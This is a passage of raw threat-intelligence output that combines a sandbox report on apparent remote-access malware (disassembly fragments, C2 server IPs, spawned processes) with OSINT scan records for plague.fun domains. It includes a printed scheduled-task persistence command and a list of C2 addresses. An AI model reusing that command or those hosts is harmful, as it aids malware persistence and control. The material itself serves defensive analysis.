8],pushesi,pushedi,push8,popecx,movesi, 0x40920c,leaedi, [ebp - 0x20],rep movsddword ptr es:[edi], dword ptr [esi],movdword ptr [ebp - 8], eax,moveax, dword ptr [ebp + 0xc],popedi,movdword ptr [ebp - 4], eax,popesi,testeax, eax,je0x403287,testbyte ptr [eax], 8,je0x403287,movdword ptr [ebp - 0xc], 0x1994000,leaeax, [ebp - 0xc],pusheax,pushdword ptr [ebp - 0x10],pushdword ptr [ebp - 0x1c],pushdword ptr [ebp - 0x20],calldword ptr [0x409058],leave,ret8,movedi, edi,pushebp,movebp, esp,subesp, 0x328,"\n 
"google.exe" file has an entrypoint instructions - "jmpdword ptr [0x402000],addbyte ptr [eax], al,addbyte ptr [eax], al,addbyte ptr [eax], al,addbyte ptr [eax], al,addbyte ptr [eax], al,addbyte ptr [eax], al,addbyte ptr [eax], al,addbyte ptr [eax], al,addbyte ptr [eax], al,addbyte ptr [eax], al,addbyte ptr [eax], al,addbyte ptr [eax], al,addbyte ptr [eax], al,addbyte ptr [eax], al,addbyte ptr [eax], al,addbyte ptr [eax], al,addbyte ptr [eax], al,addbyte ptr [eax], al,addbyte ptr [eax], al,addbyte ptr [eax], al,addbyte ptr [eax], al,addbyte ptr [eax], al,addbyte ptr [eax], al,addbyte ptr [eax], al,addbyte ptr [eax], al,addbyte ptr [eax], al,addbyte ptr [eax], al,addbyte ptr [eax], al,addbyte ptr [eax], al,addbyte ptr [eax], al,addbyte ptr [eax], al,addbyte ptr [eax], al,addbyte ptr [eax], al,addbyte ptr [eax], al,addbyte ptr [eax], al,addbyte ptr [eax], al,addbyte ptr [eax], al,addbyte ptr [eax], al,addbyte ptr [eax], al,addbyte ptr [eax], al,addbyte ptr [eax], al,addbyte ptr [eax], al,addbyte ptr [eax], al,addbyte ptr [eax], al,addbyte ptr [eax], al,addbyte ptr [eax], al,addbyte ptr [eax], al,"\n "BARBECUE.EXE" file has an entrypoint instructions - "subrsp, 0x28,call0x1400a57b8,addrsp, 0x28,jmp0x1400a50f8,int3,int3,subrsp, 0x28,movr8, qword ptr [r9 + 0x38],movrcx, rdx,movrdx, r9,call0x1400a52a0,moveax, 1,addrsp, 0x28,ret,int3,int3,int3,pushrbx,movr11d, dword ptr [r8],movrbx, rdx,andr11d, 0xfffffff8,movr9, rcx,testbyte ptr [r8], 4,movr10, rcx,je0x1400a52cb,moveax, dword ptr [r8 + 8],movsxdr10, dword ptr [r8 + 4],negeax,addr10, rcx,movsxdrcx, eax,andr10, rcx,movsxdrax, r11d,"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"34.149.204.188:443"\n "52.220.121.212:10552"\n "18.139.9.214:10552"\n "18.141.129.246:10552"'}, {u'category': 
u'General', u'origin': u'Monitored Target', u'identifier': u'target-25', u'name': u'Spawns new processes', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 9, u'description': u'Spawned process "ASYNCCLIENT.EXE" (UID: 00000000-00002976)\n Spawned process "cmd.exe" with commandline "/c schtasks /create /f /sc onlogon /rl highest /tn "google" /tr ..." (UID: 00000000-00000840)\n Spawned process "cmd.exe" with commandline "/c ""%TEMP%\\tmp138A.tmp.bat""" (UID: 00000000-00003680)\n Spawned process "schtasks.exe" with commandline "schtasks /create /f /sc onlogon /rl highest /tn "google" /tr \'" ..." (UID: 00000000-00002492), Spawned process "timeout.exe" with commandline "timeout 3" (UID: 00000000-00003920), Spawned process "google.exe" (UID: 00000000-00002700)'}, {u'category': u'General', u'origin': u'Monitored Target', u'identifier': u'target-67', u'name': u'Process launched with changed environment', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 9, u'description': u'Process "schtasks.exe" (UID: 00000000-00002492) was launched with new environment variables: "PROMPT="$P$G""'}, {u'category': u'General', u'origin': u'Monitored Target', 34.149.204.188 2022-12-18 00:08:44 Open TCP Port No LeakIX 0 0 1 0 None 20.224.2.213:80 20.224.2.213 2022-12-18 00:12:18 Physical Location No ipapi.co 0 0 2 0 None Newark, New Jersey, NJ, United States, US 2606:4700:3037::6815:13f3 2022-12-18 00:03:06 Internet Name - Unresolved No DNS Resolver 0 0 2 0 None api.plague.fun CN=api.plague.fun 2022-12-18 00:25:43 Affiliate - Internet Name No DNS Resolver 0 0 4 0 None lfbn-nic-1-313-193.w90-116.abo.wanadoo.fr 90.116.149.193 2022-12-18 00:59:50 Similar Domain Yes TLD Searcher 1 0 1 0 None misogyny.org misogyny.wtf 2022-12-18 00:03:09 SSL Certificate - Raw Data No Certificate Transparency 1 0 1 0 None 
Certificate: Data: Version: 3 (0x2) Serial Number: 04:2f:49:07:90:93:a8:06:e6:05:0c:26:40:50:ef:77:d7:82 Signature Algorithm: sha256WithRSAEncryption Issuer: C=US, O=Let's Encrypt, CN=R3 Validity Not Before: Jun 25 16:58:02 2022 GMT Not After : Sep 23 16:58:01 2022 GMT Subject: CN=api.plague.fun Subject Public Key Info: Public Key Algorithm: rsaEncryption RSA Public-Key: (2048 bit) Modulus: 00:a7:42:04:24:5f:8a:a1:8e:2a:9b:a7:b7:21:0d: a4:62:c8:51:a7:ef:52:40:c8:b5:22:04:eb:5e:8e: 25:d1:44:39:60:05:3e:fb:b9:da:dd:20:85:a9:ea: 54:8d:e2:8f:7c:be:ee:ab:ac:3e:d0:47:4d:7a:58: c4:55:85:fe:80:9b:a8:f2:35:2b:e8:90:54:7e:a1: 7b:0b:62:68:28:70:70:73:be:8e:ca:f3:45:fd:69: 71:33:d8:f2:63:fa:32:9f:a0:84:f5:07:62:63:b8: e8:92:c6:0a:ee:83:9b:26:52:0f:db:a7:0d:05:dd: ed:89:e7:52:91:7d:75:09:d1:34:a8:1d:f5:9e:54: 05:44:af:1f:65:ff:3f:72:7b:89:3a:e1:5e:60:fb: dd:c7:b7:00:dc:e2:58:d6:bc:db:84:6f:37:85:d7: 64:56:f8:ec:73:07:db:33:23:fb:b0:f2:26:2c:a5: 9f:72:c5:f1:51:16:a3:bc:8d:99:9c:f4:7a:b5:18: 7a:21:00:1a:14:0f:eb:75:c7:9b:65:14:6d:c3:ca: 92:cb:2d:35:45:05:0b:26:01:ec:ec:cc:55:4b:57: 38:28:c0:0c:ce:7c:90:a0:9e:77:81:bd:d8:44:50: 93:c4:b3:06:22:00:23:c7:f0:38:45:c6:33:2f:47: ec:a3 Exponent: 65537 (0x10001) X509v3 extensions: X509v3 Key Usage: critical Digital Signature, Key Encipherment X509v3 Extended Key Usage: TLS Web Server Authentication, TLS Web Client Authentication X509v3 Basic Constraints: critical CA:FALSE X509v3 Subject Key Identifier: 37:FE:FE:AC:E2:AA:BE:88:2E:59:E7:E5:2B:89:3F:69:6E:86:54:39 X509v3 Authority Key Identifier: keyid:14:2E:B3:17:B7:58:56:CB:AE:50:09:40:E6:1F:AF:9D:8B:14:C2:C6 Authority Information Access: OCSP - URI:http://r3.o.lencr.org CA Issuers - URI:http://r3.i.lencr.org/ X509v3 Subject Alternative Name: DNS:api.plague.fun X509v3 Certificate Policies: Policy: 2.23.140.1.2.1 Policy: 1.3.6.1.4.1.44947.1.1.1 CPS: http://cps.letsencrypt.org CT Precertificate Poison: critical NULL Signature Algorithm: sha256WithRSAEncryption 
6b:c8:33:ec:50:15:45:a2:5f:86:35:33:74:7b:46:0f:03:4e: 8a:0c:96:3b:67:03:21:d3:d0:95:4e:13:11:6d:e8:a4:5d:cc: 6b:6b:b4:94:83:8b:61:29:9e:ef:cc:de:0f:c6:f5:59:37:ba: af:c1:5a:49:7b:b6:50:7c:a5:e0:c6:e0:22:ab:ab:1a:17:d5: 4b:56:cc:5c:c8:02:83:f2:41:b8:fe:7e:2c:6a:f2:f6:f4:fb: 13:7d:8e:77:96:b0:eb:1f:19:88:59:dc:32:42:6d:71:97:65: fb:7a:61:f0:a1:64:5c:21:93:4b:f2:a8:1b:a2:ad:94:94:d9: 2a:67:6f:07:e1:96:51:9f:d3:29:68:77:83:ce:fa:d7:dc:d5: 51:01:40:78:00:08:bb:4e:4f:e2:4f:c4:52:ad:42:16:8f:e6: dd:3b:e1:d9:9e:bd:47:10:92:d2:ff:a2:ca:87:a7:32:63:54: ab:fd:1e:9f:5a:47:0c:53:42:a1:f2:f0:8c:8a:5f:b5:bb:ed: 67:f4:b8:66:cd:13:44:eb:02:f0:2d:b4:68:92:3e:f3:ed:5a: b9:1b:93:5b:07:bc:4d:4b:f0:de:f2:af:47:fc:7e:99:66:e8: ac:5e:e0:96:dc:88:b7:33:36:d6:13:27:16:fa:15:74:86:b8: cf:c7:0c:ba plague.fun 2022-12-18 00:03:36 Internet Name - Unresolved No DNS Resolver 0 0 2 0 None plague.fun Certificate: Data: Version: 3 (0x2) Serial Number: 04:43:e4:fc:51:db:21:42:a6:26:a1:af:57:d7:7c:1f:09:d4 Signature Algorithm: ecdsa-with-SHA384 Issuer: C=US, O=Let's Encrypt, CN=E1 Validity Not Before: Mar 8 17:39:27 2022 GMT Not After : Jun 6 17:39:26 2022 GMT Subject: CN=*.plague.fun Subject Public Key Info: Public Key Algorithm: id-ecPublicKey Public-Key: (256 bit) pub: 04:63:06:0d:b4:4b:4a:57:30:47:e6:68:c4:a0:06: e4:58:1f:c8:0e:38:75:86:1e:73:96:2c:89:c8:ec: 31:ce:7c:ee:7b:5d:74:75:c9:dc:a4:c6:8f:c0:3b: 27:88:0b:98:a2:b9:e4:84:96:c4:e0:e1:7d:26:c6: 1c:f1:97:8d:a0 ASN1 OID: prime256v1 NIST CURVE: P-256 X509v3 extensions: X509v3 Key Usage: critical Digital Signature X509v3 Extended Key Usage: TLS Web Server Authentication, TLS Web Client Authentication X509v3 Basic Constraints: critical CA:FALSE X509v3 Subject Key Identifier: 63:2A:32:F5:F5:82:2C:C6:1C:1E:DA:47:97:C6:17:4B:A9:C9:45:6A X509v3 Authority Key Identifier: keyid:5A:F3:ED:2B:FC:36:C2:37:79:B9:52:30:EA:54:6F:CF:55:CB:2E:AC Authority Information Access: OCSP - URI:http://e1.o.lencr.org CA Issuers - URI:http://e1.i.lencr.org/ X509v3 Subject 
Alternative Name: DNS:*.plague.fun, DNS:plague.fun X509v3 Certificate Policies: Policy: 2.23.140.1.2.1 Policy: 1.3.6.1.4.1.44947.1.1.1 CPS: http://cps.letsencrypt.org CT Precertificate SCTs: Signed Certificate Timestamp: Version : v1 (0x0) Log ID : 46:A5:55:EB:75:FA:91:20:30:B5:A2:89:69:F4:F3:7D: 11:2C:41:74:BE:FD:49:B8:85:AB:F2:FC:70:FE:6D:47 Timestamp : Mar 8 18:39:28.023 2022 GMT Extensions: none Signature : ecdsa-with-SHA256 30:45:02:20:52:60:7D:D5:E5:D5:CA:63:59:6C:4E:65: 2B:95:7D:B8:79:E9:9C:B0:1E:EA:1B:00:44:16:69:68: A8:6F:8E:69:02:21:00:BE:F3:16:4D:6E:DC:93:23:3F: 42:FA:69:56:9A:86:DA:51:86:0B:5E:E5:2F:D9:1A:20: EF:DE:71:92:E4:22:8B Signed Certificate Timestamp: Version : v1 (0x0) Log ID : 6F:53:76:AC:31:F0:31:19:D8:99:00:A4:51:15:FF:77: 15:1C:11:D9:02:C1:00:29:06:8D:B2:08:9A:37:D9:13 Timestamp : Mar 8 18:39:28.153 2022 GMT Extensions: none Signature : ecdsa-with-SHA256 30:45:02:20:65:EB:BD:E2:C0:23:77:01:75:49:D5:C7: F4:D5:F5:AE:32:BB:FB:13:6C:82:AF:B1:52:2A:48:26: 92:EC:A8:43:02:21:00:9B:0D:38:F6:B4:73:6B:2F:0E: 3B:21:BA:D2:14:2F:DE:81:B9:16:FF:B9:15:60:B4:FC: 76:D6:6C:CD:F8:27:6C Signature Algorithm: ecdsa-with-SHA384 30:64:02:30:2a:d0:0f:e2:66:51:8e:cf:8e:2f:18:f5:f2:39: 5b:75:5e:b7:8c:81:81:c5:94:dd:62:b7:eb:2b:e0:fe:7e:fe: 33:19:14:0e:b2:a7:1e:88:b9:6d:2f:75:79:0e:74:fa:02:30: 2d:50:a4:18:85:74:52:fa:f6:9d:87:92:73:ff:bf:26:46:74: 88:96:14:9a:c3:89:b1:8c:92:f2:af:7d:50:62:c7:5c:1b:83: c9:a0:73:61:25:2b:30:ac:2d:7a:28:85 2022-12-18 00:21:10 WiFi Access Point Nearby No Wigle.net 0 0 5 0 None zoom2888 (Net ID: 00:01:38:85:BD:9E) 37.7803446,-122.3906132 2022-12-18 00:21:54 HTTP Headers No Censys 0 0 2 0 None {"Content_Length": ["253"], "_encoding": {"Content_Length": "DISPLAY_UTF8", "Server": "DISPLAY_UTF8", "Cf_Ray": "DISPLAY_UTF8", "Connection": "DISPLAY_UTF8", "Content_Type": "DISPLAY_UTF8", "Date": "DISPLAY_UTF8"}, "Server": ["cloudflare"], "Date": [""], "Connection": ["close"], "Content_Type": ["text/html"], "Cf_Ray": ["-"]} 104.21.7.179 2022-12-18 
00:37:29 Malicious Affiliate IP Address Yes VirusTotal 0 0 3 0 None VirusTotal [81.88.52.242] https://www.virustotal.com/en/ip-address/81.88.52.242/information/ 81.88.52.242 2022-12-18 00:12:36 Raw Data from RIRs No ipapi.co 0 0 2 0 None {u'region_code': u'PAC', u'country_tld': u'.fr', u'ip': u'90.116.166.104', u'currency_name': u'Euro', u'currency': u'EUR', u'country_population': 66987244, u'country_code': u'FR', u'timezone': u'Europe/Paris', u'city': u'Mandelieu-la-Napoule', u'network': u'90.116.160.0/21', u'languages': u'fr-FR,frp,br,co,ca,eu,oc', u'version': u'IPv4', u'latitude': 43.5482, u'in_eu': True, u'utc_offset': u'+0100', u'continent_code': u'EU', u'country_name': u'France', u'country_capital': u'Paris', u'org': u'Orange', u'postal': u'06210', u'asn': u'AS3215', u'country': u'FR', u'region': u"Provence-Alpes-C\xf4te d'Azur", u'longitude': 6.9431, u'country_calling_code': u'+33', u'country_area': 547030.0, u'country_code_iso3': u'FRA'} 90.116.166.104 2022-12-18 00:03:05 Internet Name - Unresolved No DNS Resolver 0 0 2 0 None hook.plague.fun [{u'pubkey_sha256': u'eed16361070909e64009401f21e37cfc30dd63ff7c8f701bfc59a6437ea80bc8', u'revoked': False, u'not_after': u'2023-01-04T20:16:47Z', u'id': u'4267275535', u'cert': {u'data': 
u'MIIEWzCCA0OgAwIBAgISBEOkfSkfFQ5rrIbkS8C+aXGpMA0GCSqGSIb3DQEBCwUAMDIxCzAJBgNVBAYTAlVTMRYwFAYDVQQKEw1MZXQncyBFbmNyeXB0MQswCQYDVQQDEwJSMzAeFw0yMjEwMDYyMDE2NDhaFw0yMzAxMDQyMDE2NDdaMBoxGDAWBgNVBAMTD2hvb2sucGxhZ3VlLmZ1bjBZMBMGByqGSM49AgEGCCqGSM49AwEHA0IABPBtnT5l4ifn+eexQ12bnHGjdIeKYMh/KScMO3AYDmX/4uRsspNtM2FqvzhPBc1bLkkYDMUyXqb4E5KiVBUg8bijggJMMIICSDAOBgNVHQ8BAf8EBAMCB4AwHQYDVR0lBBYwFAYIKwYBBQUHAwEGCCsGAQUFBwMCMAwGA1UdEwEB/wQCMAAwHQYDVR0OBBYEFC1yCZkaF0sQg2Dm6zDyUVb2RUvEMB8GA1UdIwQYMBaAFBQusxe3WFbLrlAJQOYfr52LFMLGMFUGCCsGAQUFBwEBBEkwRzAhBggrBgEFBQcwAYYVaHR0cDovL3IzLm8ubGVuY3Iub3JnMCIGCCsGAQUFBzAChhZodHRwOi8vcjMuaS5sZW5jci5vcmcvMBoGA1UdEQQTMBGCD2hvb2sucGxhZ3VlLmZ1bjBMBgNVHSAERTBDMAgGBmeBDAECATA3BgsrBgEEAYLfEwEBATAoMCYGCCsGAQUFBwIBFhpodHRwOi8vY3BzLmxldHNlbmNyeXB0Lm9yZzCCAQYGCisGAQQB1nkCBAIEgfcEgfQA8gB3AN+lXqtogk8fbK3uuF9OPlrqzaISpGpejjsSwCBEXCpzAAABg68od9cAAAQDAEgwRgIhALaVt8ccgCv9ekEt0e4r8AzH1a1KyeAl8WE6QvTHmCO8AiEAsIxy8E+K6Gzp9jQ5IpY8xf+bhGNxzWJ0LSW2XYIHgAAAdwBvU3asMfAxGdiZAKRRFf93FRwR2QLBACkGjbIImjfZEwAAAYOvKHj6AAAEAwBIMEYCIQDagacz+4T5i+hZZ1qzu30jThPGH+7MEcqQ2cfCuIQsLQIhAKVGwH50llOfCZwMCuWmQ7G73k+aFP/KPnEdBlFyTwqgMA0GCSqGSIb3DQEBCwUAA4IBAQBVWuXU/MGRl/xiv+d9q79eKq3Eojjmk4U4tx3T3jIO4kyZTREnCG7Jh2uGcWNSSG+Xgdb509wwajFx+VBypVxZ/HMp0Lg4eidBszgxgFt0iEBcURMpukGrSafo6KEEFYvTwwI6MQiBLqLiQZz1fPFYvexM2Q/nw3Jy3h9QZhcj5d+1Nkle4a8XddkYVJSt4K44rCwJxQEbjzJtfDg+LU8N92T9iXrwQmYUpSayK88UuhAvzK/Qt7p6KXPU88GB/rQpO8ZLVsgZ0jrVcxwTc89ZovPhJuWO/gRAOzFPhNTR8cqlocKfMfRU4v5QSkBxFff/d12iRYKeGb5SqSGFTkHi', u'sha256': u'8841f6cbb8d7c763c61eaa51603a73de43f3a7e57f918aadcf54ea83ea9981a5', u'type': u'cert'}, u'dns_names': [u'hook.plague.fun'], u'tbs_sha256': u'deab41fcd6c330e25320ba419acf0e610bcbe18370b6f3da2b9bbc84eecf29f2', u'not_before': u'2022-10-06T20:16:48Z', u'issuer': {u'pubkey_sha256': u'8d02536c887482bc34ff54e41d2ba659bf85b341a0a20afadb5813dcfbcf286d', u'name': u"C=US, O=Let's Encrypt, CN=R3"}}, {u'pubkey_sha256': u'd6a99ccd0f59c65dd8b49943f7211883117fe3f0254976c963bc69fce14753a7', u'revoked': 
False, u'not_after': u'2023-01-21T15:38:17Z', u'id': u'4332304429', u'cert': {u'data': u'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', u'sha256': u'3e85be100bffaa41aba2e11a1f798d83d44538d9ccd62a4edf68e383abdb3c4e', u'type': u'cert'}, u'dns_names': [u'api.plague.fun'], u'tbs_sha256': u'c68f89fe15d40f6e1cfc21d38eedd5936a57e9846f1840a1f7adc96484fd86c8', u'not_before': u'2022-10-23T15:38:18Z', u'issuer': {u'pubkey_sha256': u'8d02536c887482bc34ff54e41d2ba659bf85b341a0a20afadb5813dcfbcf286d', u'name': u"C=US, O=Let's Encrypt, CN=R3"}}, {u'pubkey_sha256': u'9e725d321f7afc5c13793aed856285bb5b34c5a83ecc628871afaf31ed38b6bc', u'revoked': False, u'not_after': u'2023-01-28T18:19:30Z', u'id': u'4359905513', u'cert': {u'data': u'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', u'sha256': u'c8334a1e1d54310e254140e075b554abf7eb6eee3a8330536bfb363810204efa', u'type': u'cert'}, u'dns_names': [u'*.plague.fun', u'plague.fun'], u'tbs_sha256': u'8f1429103c47de6d147ec80069f42bf0414cf5b0a220f075e16f3573d47cb42d', u'not_before': u'2022-10-30T18:19:31Z', u'issuer': {u'pubkey_sha256': u'276fe8a8c4ec7611565bf9fce6dcace9be320c1b5bea27596b2204071ed04f10', u'name': u"C=US, O=Let's Encrypt, CN=E1"}}, {u'pubkey_sha256': u'0ea98ff70d97728c7d75c56641910e1b9453f50c52bce53928d3c5ca76c630da', u'revoked': False, u'not_after': u'2023-01-28T20:43:45Z', u'id': u'4360219490', u'cert': {u'data': u'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', u'sha256': u'e90fee33471e445f420dc6f027f4c54e500b881c2f610a9e165722ea988fac0e', u'type': u'precert'}, u'dns_names': [u'*.plague.fun', u'plague.fun'], u'tbs_sha256': u'837ecb87912fdd04bdfaa11a3792a9b8c2864a8c4fde87f5e44e6d4ee993b490', u'not_before': u'2022-10-30T20:43:46Z', u'issuer': {u'pubkey_sha256': u'f3559fd766dc2e51474007c996ec67cd9e85ae0fa827d3d663f5abc2eafcbe24', u'name': u'C=US, O=Google Trust Services LLC, CN=GTS CA 1P5'}}, {u'pubkey_sha256': u'e7ddd456c999332466d993852c18852a3e330cfeb040adcdfdea0f94687eee82', u'revoked': False, 
u'not_after': u'2023-02-02T13:11:40Z', u'id': u'4379481732', u'cert': {u'data': u'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', u'sha256': u'1e9cb916ccc4fd493f7420d2e58d07274fd1c30f24785e0b9764ffd07e7fc73f', u'type': u'cert'}, u'dns_names': [u'atlas.plague.fun'], u'tbs_sha256': u'0ec99f53bec04ae700149f53210a6fe7beefeec2222cbaf07f35cc974d41ae16', u'not_before': u'2022-11-04T13:11:41Z', u'issuer': {u'pubkey_sha256': u'8d02536c887482bc34ff54e41d2ba659bf85b341a0a20afad 2022-12-18 00:09:39 Open TCP Port No LeakIX 0 0 2 0 None 188.114.97.9:443 188.114.97.9 2022-12-18 00:09:27 Open TCP Port No Pulsedive 0 0 3 0 None 188.114.96.8:443 188.114.96.0/24 2022-12-18 00:03:11 Affiliate - IP Address No DNS Look-aside 2 0 2 0 None 81.88.52.238 81.88.52.232 2022-12-18 00:09:45 Open TCP Port No LeakIX 0 0 2 0 None 188.114.96.9:80 188.114.96.9 2022-12-18 00:02:58 SSL Certificate - Raw Data No Certificate Transparency 1 0 1 0 None Certificate: Data: Version: 3 (0x2) Serial Number: 03:b5:ee:aa:9f:a9:bb:86:86:d8:5d:7e:c7:71:cb:57:b5:27 Signature Algorithm: sha256WithRSAEncryption Issuer: C=US, O=Let's Encrypt, CN=R3 Validity Not Before: Aug 24 16:36:10 2022 GMT Not After : Nov 22 16:36:09 2022 GMT Subject: CN=api.plague.fun Subject Public Key Info: Public Key Algorithm: id-ecPublicKey Public-Key: (256 bit) pub: 04:49:59:ba:16:cf:70:69:e2:32:06:c9:70:ba:5f: a5:78:82:8c:0b:94:c3:eb:5e:23:37:b4:eb:a8:2c: 56:f9:0e:d7:d0:ab:6f:8e:d7:9d:b3:dc:4a:5d:40: 1b:4b:96:83:64:91:0b:8a:4b:d1:e0:17:cc:cb:25: 17:74:d8:2f:e5 ASN1 OID: prime256v1 NIST CURVE: P-256 X509v3 extensions: X509v3 Key Usage: critical Digital Signature X509v3 Extended Key Usage: TLS Web Server Authentication, TLS Web Client Authentication X509v3 Basic Constraints: critical CA:FALSE X509v3 Subject Key Identifier: D4:FC:B1:AD:62:F6:65:B4:77:1D:8C:F3:26:59:20:33:E8:34:E2:7F X509v3 Authority Key Identifier: keyid:14:2E:B3:17:B7:58:56:CB:AE:50:09:40:E6:1F:AF:9D:8B:14:C2:C6 Authority Information Access: OCSP - 
URI:http://r3.o.lencr.org CA Issuers - URI:http://r3.i.lencr.org/ X509v3 Subject Alternative Name: DNS:api.plague.fun X509v3 Certificate Policies: Policy: 2.23.140.1.2.1 Policy: 1.3.6.1.4.1.44947.1.1.1 CPS: http://cps.letsencrypt.org CT Precertificate Poison: critical NULL Signature Algorithm: sha256WithRSAEncryption a7:18:19:be:f9:de:e2:92:fc:b4:2f:ff:09:38:1c:42:25:e6: 01:6c:d8:e8:c9:77:6a:41:20:d2:45:21:cf:f6:24:6e:28:1d: ac:28:50:d4:8a:0c:31:74:10:0c:07:40:e8:1a:d9:44:d5:3b: ac:91:71:d6:e0:98:69:40:a1:f7:fc:ef:bd:5e:7b:66:85:7a: ed:35:a3:82:d2:9e:37:a2:ca:bc:c1:cf:6e:5b:d9:04:ae:28: e8:a2:05:a4:f8:e3:e6:35:09:dd:9f:ee:c8:75:98:eb:4c:12: f1:d5:6d:dd:91:0e:ad:8a:24:08:b4:dd:ad:a3:f1:1c:53:9d: 5d:73:94:4a:55:70:02:39:e3:07:8a:2e:76:95:13:71:03:46: 83:7e:45:3a:de:ef:0e:b8:65:6a:ee:e6:68:37:d9:a6:49:3b: 23:98:f7:62:f7:19:9f:8f:7b:73:b9:fc:9d:0b:4a:39:d1:91: af:95:90:1a:28:f4:c4:05:48:21:17:b9:59:cb:7f:59:3c:6d: 8b:a7:ec:b8:2b:b3:2d:9b:4b:34:fd:56:65:b2:df:4b:28:3b: 51:a3:cd:23:5a:ff:7f:67:49:1b:a8:f1:3b:bf:7c:64:d5:7d: cf:24:50:67:d0:5b:2e:30:27:f6:a1:0b:de:54:13:2f:7a:de: 8e:67:a8:68 plague.fun 2022-12-18 00:20:56 Physical Location No Censys 0 0 2 0 None United States, North America 2606:4700:3031::ac43:93e6 2022-12-18 00:09:21 Raw Data from RIRs No LeakIX 0 0 2 0 None {u'Services': [{u'protocol': u'https', u'event_type': u'service', u'ip': u'104.21.7.179', u'vendor': u'', u'port': u'443', u'transport': [u'tcp', u'tls', u'http'], u'event_source': u'HttpPlugin', u'network': {u'organization_name': u'CLOUDFLARENET', u'asn': 13335, u'network': u'104.16.0.0/13'}, u'service': {u'credentials': {u'username': u'', u'raw': None, u'password': u'', u'noauth': False, u'key': u''}, u'software': {u'modules': None, u'version': u'', u'os': u'', u'name': u'cloudflare', u'fingerprint': u''}}, u'event_fingerprint': u'6d1f2e7c9ee98731fedbc44a39cb147fd61faf139899b932660fdc442e6b1042', u'leak': {u'dataset': {u'files': 0, u'rows': 0, u'ransom_notes': None, u'infected': False, 
u'collections': 0, u'size': 0}, u'type': u'', u'severity': u'', u'stage': u''}, u'event_pipeline': [u'CertStream', u'l9scan', u'tcpid', u'HttpPlugin'], u'http': {u'status': 0, u'title': u'Raccourcis personnalis\xe9s dans After Effects', u'url': u'', u'header': {u'server': u'cloudflare'}, u'length': 0, u'favicon_hash': u'', u'root': u''}, u'tags': [], u'ssl': {u'cypher_suite': u'TLS_AES_128_GCM_SHA256', u'jarm': u'00000000000000000000000000000000000000000000000000000000000000', u'certificate': {u'domain': [u'*.ridcasib.gq', u'ridcasib.gq'], u'cn': u'*.ridcasib.gq', u'valid': True, u'not_after': u'2023-02-01T17:06:19Z', u'key_size': 256, u'issuer_name': u'E1', u'fingerprint': u'17f90ab081bda153ca6efb07f230a67a13d0390159eb20b845c1f8ccc7494904', u'key_algo': u'ECDSA', u'not_before': u'2022-11-03T17:06:20Z'}, u'enabled': True, u'detected': False, u'version': u'TLSv1.3'}, u'mac': u'', u'ssh': {u'motd': u'', u'version': 0, u'banner': u'', u'fingerprint': u''}, u'reverse': u'', u'geoip': {u'region_iso_code': u'', u'country_iso_code': u'', u'city_name': u'', u'location': {u'lat': 0, u'lon': 0}, u'country_name': u'', u'continent_name': u'', u'region_name': u''}, u'host': u'ridcasib.gq', u'summary': u'Date: Thu, 03 Nov 2022 18:06:43 GMT\r\nContent-Type: text/html; charset=UTF-8\r\nTransfer-Encoding: chunked\r\nConnection: close\r\nSet-Cookie: ch1c=b\r\nCF-Cache-Status: DYNAMIC\r\nReport-To: {"endpoints":[{"url":"https:\\/\\/a.nel.cloudflare.com\\/report\\/v3?s=rH8ESsBQHTPWB3LJ9NCCkczLfKNPeprjF6hyQILMQmEzv4zCxsccXeVti9SA2Aa%2FkenoWQSMGTZ%2FV%2BcmZnJkipX0qRVJ8bBj4qpbozdEMEce4C6PN%2FuzBNbmq37dzA%3D%3D"}],"group":"cf-nel","max_age":604800}\r\nNEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}\r\nServer: cloudflare\r\nCF-RAY: 76470ba2cd16b8a3-AMS\r\nalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400\r\n\nPage title: Raccourcis personnalis\xe9s dans After Effects', u'time': u'2022-11-03T18:06:43.482158627Z'}, {u'protocol': u'http', u'event_type': u'service', u'ip': 
u'104.21.7.179', u'vendor': u'', u'port': u'80', u'transport': [u'tcp', u'http'], u'event_source': u'HttpPlugin', u'network': {u'organization_name': u'CLOUDFLARENET', u'asn': 13335, u'network': u'104.16.0.0/13'}, u'service': {u'credentials': {u'username': u'', u'raw': None, u'password': u'', u'noauth': False, u'key': u''}, u'software': {u'modules': None, u'version': u'', u'os': u'', u'name': u'cloudflare', u'fingerprint': u''}}, u'event_fingerprint': u'6d1f2e7c9ee98731fedbc44a39cb147fd61faf139899b932cce72124672d53fa', u'leak': {u'dataset': {u'files': 0, u'rows': 0, u'ransom_notes': None, u'infected': False, u'collections': 0, u'size': 0}, u'type': u'', u'severity': u'', u'stage': u''}, u'event_pipeline': [u'CertStream', u'l9scan', u'tcpid', u'HttpPlugin'], u'http': {u'status': 0, u'title': u'Most viewed', u'url': u'', u'header': {u'server': u'cloudflare'}, u'length': 0, u'favicon_hash': u'', u'root': u''}, u'tags': [], u'ssl': {u'cypher_suite': u'', u'jarm': u'', u'certificate': {u'domain': None, u'cn': u'', u'valid': False, u'not_after': u'0001-01-01T00:00:00Z', u'key_size': 0, u'issuer_name': u'', u'fingerprint': u'', u'key_algo': u'', u'not_before': u'0001-01-01T00:00:00Z'}, u'enabled': False, u'detected': False, u'version': u''}, u'mac': u'', u'ssh': {u'motd': u'', u'version': 0, u'banner': u'', u'fingerprint': u''}, u'reverse': u'', u'geoip': {u'region_iso_code': u'', u'country_iso_code': u'', u'city_name': u'', u'location': {u'lat': 0, u'lon': 0}, u'country_name': u'', u'continent_name': u'', u'region_name': u''}, u'host': u'nonsvooquaca.tk', u'summary': u'Date: Thu, 03 Nov 2022 16:49:11 GMT\r\nContent-Type: text/html; charset=UTF-8\r\nTransfer-Encoding: chunked\r\nConnection: close\r\nSet-Cookie: ch1c=b\r\nCF-Cache-Status: DYNAMIC\r\nReport-To: 
